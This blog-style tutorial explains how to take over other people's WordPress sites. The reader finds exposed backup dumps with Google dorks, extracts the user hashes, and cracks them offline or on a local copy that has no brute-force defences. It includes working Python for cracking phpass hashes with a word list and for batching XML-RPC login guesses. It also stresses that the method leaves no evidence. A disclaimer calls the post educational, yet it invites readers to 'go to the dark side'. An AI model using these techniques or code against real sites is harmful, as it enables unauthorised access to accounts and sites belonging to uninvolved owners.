Hacking website locally with brute-force attack

Hacking a website with a brute-force attack on a local machine

I have already written about the danger that insecurely stored backup files pose to your website. That was a case where I found the FTP credentials used by the Updraft backup WordPress plugin stored in a backup of the database. I think it is the most straightforward hacking technique there is, and it requires no specialised knowledge or software. Today I will tell you about a more sophisticated method.

So, let's begin with the very first step of this method. As I mentioned in the previous post, certain Google dorks lead you to websites with unprotected backup files exposed through open directory listings. Trust me, there are hundreds if not thousands of such sites, and you can find them by applying various dorks, since different WordPress backup plugins use different file naming schemes.

Insecure WordPress backup files

OK, now that you have a list of potentially vulnerable websites, pick one and proceed with the next steps. We are looking for sites with database backups that you can use on your local machine. Download the WordPress database dump and you are ready to start.

Preparation

As you may know, a proper WordPress install never stores the password itself: the `user_pass` column of `wp_users` holds a salted hash (`$P$B...`, produced by the bundled phpass library; WordPress 6.8 and later write bcrypt-based `$wp$2y$` hashes for new passwords). A hash cannot be decrypted, and because every hash carries its own random salt you will not find it in lookup or rainbow tables, which cover unsalted MD5. One correction to a widespread belief: the `AUTH_KEY`/`AUTH_SALT` constants in wp-config.php play no part in this. They sign cookies and nonces, while the salt that protects the password is stored inside the 34-character hash itself. So the only workaround is to guess, and the useful consequence is that the database dump alone is enough: offline crackers such as hashcat (mode 400, phpass) and John the Ripper (`phpass` format) test guesses against the hash directly, and, as described below, you can also brute-force a local copy of the website without touching the real one. For reference, the wp-config.php keys look like this:

define('AUTH_KEY',         'Dp?:L)G>Vrz/-M2.Xqw:@PX]K kijK-}&NwNq_q[[a dK|K^SJ$m!A`X|9xB|^Q=');
define('SECURE_AUTH_KEY',  'zC+&YDCbGE!A4-tuS^q8I^lz?<hp+/r.IFs@n+QBnSb^rLH45 TDvsKl3dp1(o9E');
define('LOGGED_IN_KEY',    '5(ls-Zmzk{0rRC.YB?!l,#IAHn;7-`7?(Td<]ufxj#6]`{/!-rSI9bg|~J{z;~*e');
define('NONCE_KEY',        ':Gt_RhK_ |/=Eo-6@7f3EY<ntxm3yeH1n~)7GlHedY7n{YT[gVU?G(u!hj.DmNZr');
define('AUTH_SALT',        '#Rw{<Oo!`:vofdKZXWg/bZK7 I.{x#ASweWKt |~]MYT9zR-Q9O/n)b4D;|.:H~6');
define('SECURE_AUTH_SALT', 'BWLfs@Sp!#Ky>m*I&7`j)cci|h$Rjtc>L%IZ5m0fac^hHz-qdmGE`2+Z)O&y#),w');
define('LOGGED_IN_SALT',   'lnF= `OyZk66W5u%U2o[MtTOX4+Z+G!C/zZ+ 5b=uoDbp/IW,~qC}wB3>vaw3? G');
define('NONCE_SALT',       'O8Id l=fOxM.n)t9b6V5^WWacgs{H^BVr@/u7_t)i/NPzH@4>=9X4*~}8R*$-u4d');
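Because the salt travels inside the `$P$` hash, you do not even need a running WordPress to test guesses; the hash can be checked directly from the dump. The script below is an added example, not code from the original post or from WordPress itself. It pulls `user_login`/`user_pass` pairs out of a constructed `wp_users` INSERT fragment, reimplements the portable phpass hash that `wp_hash_password()` produced, and runs a word list plus a few mangling rules against each hash (the same word-list advice the post gives later). The `admin` hash is the test vector shipped with the phpass library (password `test12345`); the `editor` hash, the fixed salt `abcdefgh`, the word list and all other names are constructed for this example. Hashes beginning `$wp$2y$` (WordPress 6.8 and later) are not handled here.

```python
import hashlib
import re
from typing import Iterator, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 16 digest bytes -> 22 chars."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Portable phpass hash as wp_hash_password() produced it.

    WordPress constructs PasswordHash(8, true); phpass adds 5 on PHP 5+, so a
    stored hash carries ITOA64[13] == 'B' and costs 2**13 MD5 rounds per guess.
    """
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(digest, 16)


def phpass_check(password: str, stored: str) -> bool:
    """True if `password` reproduces `stored`; salt and cost come from the hash."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    return phpass_hash(password, stored[4:12], count_log2) == stored


# Constructed wp_users fragment in the form a SQL dump contains it. The admin
# hash is the test vector shipped with phpass (password: test12345); the editor
# hash is generated here with a fixed salt (password: Winter2017).
EDITOR_HASH = phpass_hash("Winter2017", "abcdefgh")
SAMPLE_DUMP = f"""
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`) VALUES
(1, 'admin', '$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0', 'admin', 'admin@example.org'),
(2, 'editor', '{EDITOR_HASH}', 'editor', 'editor@example.org');
"""

# Constructed word list standing in for a real collection such as rockyou.txt.
WORDLIST = ["password", "winter", "test12345", "letmein"]

_USER_ROW = re.compile(r"\(\s*\d+,\s*'([^']*)',\s*'(\$[PH]\$[^']{31})'")


def extract_users(dump: str) -> list[tuple[str, str]]:
    """(user_login, user_pass) pairs from the INSERT rows of a dump."""
    return _USER_ROW.findall(dump)


def candidates(wordlist: list[str]) -> Iterator[str]:
    """Word list plus cheap mangling rules: far cheaper than walking a mask."""
    for word in wordlist:
        yield word
        yield word.capitalize()
        for suffix in ("1", "123", "!", "2017"):
            yield word + suffix
            yield word.capitalize() + suffix


def crack(stored: str, wordlist: list[str]) -> Optional[str]:
    """First candidate that reproduces `stored`, or None if the list is exhausted."""
    for guess in candidates(wordlist):
        if phpass_check(guess, stored):
            return guess
    return None


if __name__ == "__main__":
    for login, stored in extract_users(SAMPLE_DUMP):
        print(login, stored, "->", crack(stored, WORDLIST))
```

Note how the cost character right after `$P$` sets the work factor: a WordPress hash carries `B`, which is 8192 MD5 rounds per guess, so a pure Python loop manages only a few hundred guesses per second per hash and a real run belongs in hashcat; the logic, however, is exactly this.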

The main benefit of brute-forcing on the local machine is that you bypass the plugins and other measures that normally make this a pain. Various WordPress plugins offer anti-brute-force features: Turing tests (CAPTCHA/reCAPTCHA), login-attempt limits with IP lockouts, IP-restricted access to wp-login.php, or a non-standard URL for the login form. Since we have the database file, we can forget about all of them.

What's next? Install MAMP, XAMPP or similar software so you can run a WordPress install locally on your PC. Create an empty database for the experiment and import the backup file, with phpMyAdmin or, if necessary, with the same plugin that generated it. You will need a few changes in this database, chiefly the `siteurl` and `home` rows in `wp_options`, which must point at your local host; the password hashes need no change, since they do not depend on the original wp-config.php keys. The goal is to have the WordPress login form reachable on the local install. That install is free of security plugins (sorry Wordfence, you cannot protect a site whose backup files are not protected), of security-oriented .htaccess rules that restrict access to the login form, and of anything else that would ruin your brute-force experience.

Hacking website on local machine

Finally, you have the website running on your PC, unprotected in any way. You leave no evidence on the real site, since everything happens on your local install (you do not even need an internet connection), and you know the username (look at `user_login` in `wp_users`). Brute-forcing manually is not smart; you need something that does it for you at a very high rate.

There are plenty of brute-force tools available on the Internet, and which one to use is your choice. A web search will find them, but keep in mind that the more sophisticated tools need additional setup. WPScan, WPForce, Burp, Metasploit, OWASP ZAP, Wordbrutepress and others are suitable for this task.

The last thing you need before the attack is a word list: a database or plain text file with lots and lots of passwords. More advanced tools can also enumerate every string in a given character space (a mask or exhaustive attack), but beyond a few characters that is hopeless against a slow hash, so concentrate on password collections and apply mangling rules to them (capitalisation, appended digits and years).

Now you are ready: launch your preferred tool, feed it the data you have (at least the username) and start the attack. Running entirely on your local machine, it reaches a far higher guessing rate than the real site would ever allow, but remember that you are guessing and it takes time. The XML-RPC interface (xmlrpc.php) can raise throughput further, because `system.multicall` lets a single POST carry many login attempts; note, however, that since WordPress 4.4 the XML-RPC server stops checking credentials after the first failed login within a request, so this only helps against older versions. If the attack fails, try other word lists and password databases. Here is the video example made by HomeLab IT:
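The XML-RPC batching mentioned above, as an added example that is not code from the original post or from any of the tools it lists. One `system.multicall` request wraps many `wp.getUsersBlogs` calls (a method any authenticated user may call); each wrong guess comes back as a 403 fault struct, a right one as blog data. The blog record, the candidate list and the canned server reply are constructed for the example, and the `http://localhost:8888` URL in the usage line is assumed. Keep the caveat in mind: on WordPress 4.4 and later every call after the first failed login in a request returns the same 403 fault without being checked, so batching buys nothing there.

```python
import urllib.request
import xmlrpc.client
from typing import Optional

# Constructed blog record of the kind wp.getUsersBlogs returns for valid credentials.
_BLOG = {"isAdmin": True, "url": "http://localhost/", "blogid": "1",
         "blogName": "local copy", "xmlrpc": "http://localhost/xmlrpc.php"}
# Fault struct WordPress returns inside a multicall for a failed login.
_AUTH_FAULT = {"faultCode": 403, "faultString": "Incorrect username or password."}


def build_multicall(username: str, candidates: list[str]) -> str:
    """One system.multicall body that tries every candidate via wp.getUsersBlogs."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in candidates]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(response_xml: str, candidates: list[str]) -> Optional[str]:
    """Candidate whose call returned blog data instead of a fault struct, if any."""
    (results,), _ = xmlrpc.client.loads(response_xml)
    for pw, result in zip(candidates, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # 403: wrong password (or unchecked, on 4.4+ after a failure)
        return pw     # success entries are one-element arrays holding the blog list
    return None


def try_batch(xmlrpc_url: str, username: str, candidates: list[str]) -> Optional[str]:
    """POST one batch to the local copy's xmlrpc.php and report a hit, if any."""
    req = urllib.request.Request(
        xmlrpc_url,
        data=build_multicall(username, candidates).encode(),
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(req) as resp:
        return parse_multicall(resp.read().decode(), candidates)


def fake_response(correct: str, candidates: list[str]) -> str:
    """Constructed server reply: a fault for every wrong guess, blog data for the right one."""
    results = [[[_BLOG]] if pw == correct else _AUTH_FAULT for pw in candidates]
    return xmlrpc.client.dumps((results,), methodresponse=True)


if __name__ == "__main__":
    batch = ["password", "letmein", "Winter2017", "qwerty"]
    print(parse_multicall(fake_response("Winter2017", batch), batch))
    # Against the local copy (assumed URL):
    # print(try_batch("http://localhost:8888/xmlrpc.php", "editor", batch))
```

If your local copy runs a current WordPress, the whole batch after the first wrong guess is rejected unchecked, so the same loop must fall back to one credential per request; the parser above cannot tell the two kinds of 403 apart because the server uses the same fault message for both.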

Possible problems

Several things can make the guessing fail. A very strong password is the obvious one. Another is searching the wrong character space: not everyone builds passwords from Latin letters, digits and punctuation, and if the password contains letters that exist only in a particular language you are stuck unless your candidates include those letters. Long or unusual passwords that appear in no password collection are a third. Remember also that each guess against a standard `$P$B` hash costs 2^13 MD5 rounds, which is why a good word list with rules beats exhaustive enumeration. Still, more advanced methods give you a chance of reaching the goal.

Conclusion

Let's assume you guessed the password. What's next? I do not need to tell you what you can do with a WordPress administrator password; it is your choice. You can be the hero who reports the security issue to the website owner, or you can go to the dark side, hack the real site and do what attackers usually do.

I published this post purely for educational purposes, to show where the security problem is. Today I showed another way an attacker can compromise almost any WordPress website that leaks a backup of its database.
